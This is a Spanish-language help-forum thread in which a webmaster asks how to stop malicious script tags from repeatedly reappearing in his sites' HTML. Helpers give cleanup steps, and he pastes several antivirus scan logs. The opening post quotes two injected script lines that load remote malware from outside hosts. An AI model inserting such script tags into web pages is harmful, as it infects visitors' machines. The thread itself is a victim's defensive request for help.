Foro de InfoSpyware - Foro de Hijackthis - Foro de Virus

Hola a todos,
tengo dos webs alojadas en distintos servidores. En las páginas html de ambas se me colocan los siguientes scripts
<script src=http://sinuga.ee/top/sisukaart.php ></script>
y
<script src=http://hutakrzeszowska.pl/media/index.php ></script>

cuando las abro desde internet el kaspersky me detecta un troyano:
Detectados troyano Packed.JS.Agent.bd

He borrado los scripts de las paginas pero se vuelven a colocar.
He pasado el kaspersky al pc y está limpio.

Mi pregunta es,
cómo se meten en las páginas y cómo puedo evitarlo.

Gracias
Vert.

Hola, vertice563,

Ese tipo de virus se están haciendo muy popular últimamente.

Puedes infectar tus paginas web con ellos de dos formas,
1-Es que tu Pc, este infectada.
2-Es que el servidor, (Hostin), donde alojas tus paginas web este infectado.

Desde acá, lo único que podemos comprobar que el virus no este alojada en tu Pc.

(primero, que nada, borra las modificaciones, de todas las paginas).
(cambia tus contraseñas, y si se te permite el nombre de usuario).
Luego, sigue estos Pasos:


Por favor, sigue estos pasos, lee bien todas las indicaciones :

Si no puedes hacer algún paso, saltéalo y continuas con los demás.


1 »»
Descarga lo siguiente: LOS INSTALAS Y ACTUALIZAS SEGUN SU MANUAL »»»» PERO NO LOS EJECUTES AUN.


» CCLEANER. Lo instalas según Su Manual

»
DR WEB CURE-IT y su Manual

» MALWAREBYTE´S. Lo instalas y actualizas según su manual.


2 »»
Inicia EN MODO A PRUEBA DE ERRORES MIRA AQUI


3 »»
Ejecuta las herramientas de una en una y en este orden:


»
Ejecuta DR WEB, haciendo 1ero un chequeo express y luego un EXAMEN COMPLETO, eliminando todo lo que encuentre.

»
MALWAREBYTE. Selecciona hacer un "escaneo completo". Una vez finalizado, si detecta algo, eliges " quitar lo seleccionado ". Si te pide reiniciar, lo haces. En su "registros" quedará guardado el reporte que se genera, cópialo y pégalo en tu próxima respuesta.

»
CCLEANER. usando primero su opción de "Limpiador" para borrar cookies, temporales de Internet y archivos obsoletos, y luego usa su opción de "Registro" para limpiar todo el registro de Windows (haciendo copia de seguridad).


4 »»
Inicia en modo normal.


5 »»
Realiza un scan online con KASPERSKY ONLINE SCANER (usa la Versión inglesa)
Si utilizas FIREFOX, debes agregar la extensión IE Tab , que permite Integrar Internet Explorer en pestañas de Mozilla/Firefox.

En tu próxima respuesta, debes pegar el reporte de MALWAREBYTES, Dr. Web y el de kaspersky online.


Salu2.

Hola Fer21021,
gracias por las indicaciones.
He cambiado todas las contraseñas.
He pasado los programas que me indicaste.
No he podido pasar el Kaspersky on line pq tiene desctivada esa opción. Supongo que la activarán pronto. Por ahora le pasé mi Kaspersky.
Pego el informe:

------------------------------------------------
Malwarebytes' Anti-Malware 1.41
Versión de la Base de Datos: 2775
Windows 5.1.2600 Service Pack 2

20/10/2009 4:50:28
mbam-log-2009-10-20 (04-50-25).txt

Tipo de examen : Examen Completo (C:\|)
Objetos examinados: 420270
Tiempo transcurrido: 2 hour(s), 19 minute(s), 4 second(s)

Procesos en Memoria Infectados: 0
Módulos en Memoria Infectados: 0
Claves del Registro Infectadas: 0
Valores del Registro Infectados: 1
Elementos de Datos del Registro Infectados: 4
Carpetas Infectadas: 0
Ficheros Infectados: 1

Procesos en Memoria Infectados:
(No se han detectado elementos maliciosos)

Módulos en Memoria Infectados:
(No se han detectado elementos maliciosos)

Claves del Registro Infectadas:
(No se han detectado elementos maliciosos)

Valores del Registro Infectados:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Services\del (Malware.Trace) -> No action taken.

Elementos de Datos del Registro Infectados:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify (Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Explorer\Advanced\Start_ShowMyComputer (Hijack.StartMenu) -> Bad: (0) Good: (1) -> No action taken.

Carpetas Infectadas:
(No se han detectado elementos maliciosos)

Ficheros Infectados:
C:\WINDOWS\system32\_id.dat (Malware.Trace) -> No action taken.
-------------------------------------------------------------------

Gracias
Vert

Con permisito dijo monchito...

vertice563:
Me parece que en el Malwarebytes' Anti-Malware no le pusiste "Quitar todo lo seleccionado" tenes que hacer ese paso para limpiar y "curar" las infecciones.



Saludos,
Kaletra

uyy, es que pegué al primer anáisis y sí, en el primer análisis no le indiqué eliminar.
Cuando repetí el anáisis los borré.
Igualmente, repetiré al analisis y colgaré el nuevo reporte.
Gracias
Vert

Hola,

Como bien indica el compa. kaletra, vuelve a pasar el malwarebytes, pero antes actualizalo ya que lo pasaste desactualizado.


Trae también el reporte del Dr.web (en su manual se indica como se obtiene el reporte).

Y vuelve a intentar con kaspersky online.


Nos comentas como te fue y nos traes los reportes.


saludos.

Hola a todos,
pego los dos informes.
El kaspi online sigue sin estar disponible. "A new, improved version of the
Kaspersky Online Scanner
The current Kaspersky Online Scanner is unavailable - we apologize for the inconvenience. While you are waiting for the improved Online Scanner, why not try a free trial of Kaspersky Internet Security 2010, which has everything you need to keep your computer safe."
Por ahora le paso el que tengo, 2009, actualizado y en cuanto esté disponible le paso el online. A menos que me indiquéis otra cosa.
------------------------------------------
cleaner42.exe C:\Adriana\AATrabajo2\nuevos\TheCleaProv4[1].2.4319\The Cleaner Professional v4.2.4319 Archivo comprimido contiene objetos infectados Movido.
gm5b_setup.exe C:\Adriana\GM5[1].2_wsc Archivo comprimido contiene objetos infectados Movido.
mailpv.exe C:\software\dosmio\mailpb Trojan.Inject.3744 Eliminado.
-----------------------------------------------
Malwarebytes' Anti-Malware 1.41
Versión de la Base de Datos: 3029
Windows 5.1.2600 Service Pack 2 (Safe Mode)

25/10/2009 17:55:22
mbam-log-2009-10-25 (17-55-22).txt

Tipo de examen : Examen Completo (C:\|)
Objetos examinados: 426650
Tiempo transcurrido: 2 hour(s), 21 minute(s), 25 second(s)

Procesos en Memoria Infectados: 0
Módulos en Memoria Infectados: 0
Claves del Registro Infectadas: 0
Valores del Registro Infectados: 0
Elementos de Datos del Registro Infectados: 0
Carpetas Infectadas: 0
Ficheros Infectados: 2

Procesos en Memoria Infectados:
(No se han detectado elementos maliciosos)

Módulos en Memoria Infectados:
(No se han detectado elementos maliciosos)

Claves del Registro Infectadas:
(No se han detectado elementos maliciosos)

Valores del Registro Infectados:
(No se han detectado elementos maliciosos)

Elementos de Datos del Registro Infectados:
(No se han detectado elementos maliciosos)

Carpetas Infectadas:
(No se han detectado elementos maliciosos)

Ficheros Infectados:
C:\Archivos de programa\Deskshare\Video Edit Magic 4.2\Video Edit Magic.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
C:\software\Video_Edit_Magic_4[1].27\Video Edit Magic 4.27\Video Edit Magic.exe (Trojan.Downloader) -> Quarantined and deleted successfully.
------------------------------------------------------

Gracias.

Que tal, ví tu post porque es igual a lo que me pasó a mi. En lo que puedo ayudarte es en decirte lo mismo que me dijeron desde mi proveedor de Hosting.
1) Eliminar tu cuenta (con lo cual se eliminan completamente todos los archivos y no solamente tus páginas html). Seguramente y como a mí, te hayan modificado otros archivos que estan fuera de la carpeta www, y por eso el script dañino cada vez que se ejecuta, modifica tus paginas.
Para no revisar todos los archivos de tu servidor y correr el riesgo de que Google elimine tu sitio del índice con lo que eso trae aparejado seguramente si tardas algún tiempo en volver todo a la normalidad, lo mejor es optar por dar de baja el sitio y volver a abrir uno nuevo con la misma dirección url.
Ojo, se pueden tomar otras medidas menos drásticas, pero aca el problema es el tiempo. No podés esperar una semana en solucionar el problema porque seguramente los buscadores lo notarán y les advertira a los usuarios que intenten acceder a tu sitio del problema, con lo que perderás visitas y aparte, tu sitio perderá prestigio.
2) El usuario y contraseña tenes que asegurarte de que sean difícil de rastrear, que incluya símbolos como >![{ç&# etc. y que tenga muchos caracteres (yo ahora tengo una de 20 caracteres y lleno de simbolos raros). Además, cambiarlos cada cierto tiempo.
Bueno, espero que puedas solucionar tu problema.
Un saludo.

Hola,


Lo que te recomendaron arriba lo puedes hacer, pero si no desinfectas la Pc, se volverá a infectar la pagina de Internet.


si no puedes con kas versión inglesa usa :
»» Realiza un scan online con Panda ActiveScan+Manual.


Trae el reporte.


Saludos.

Hola a todos,
gracias parsnova, no sabía que podía tener esas consecuencias. Ya me he puesto en contacto con el hosting. Haré el cambio.
Gracias Fer21021, paso el panda on-line y pego el informe.
Crees que con eso será suficiente?
Posteriomente cuando esté manipulando los archivos (html, php, etc.) que contienen el script tengo el riesgo de infectar el pc? Cómo lo hago?
Gracias.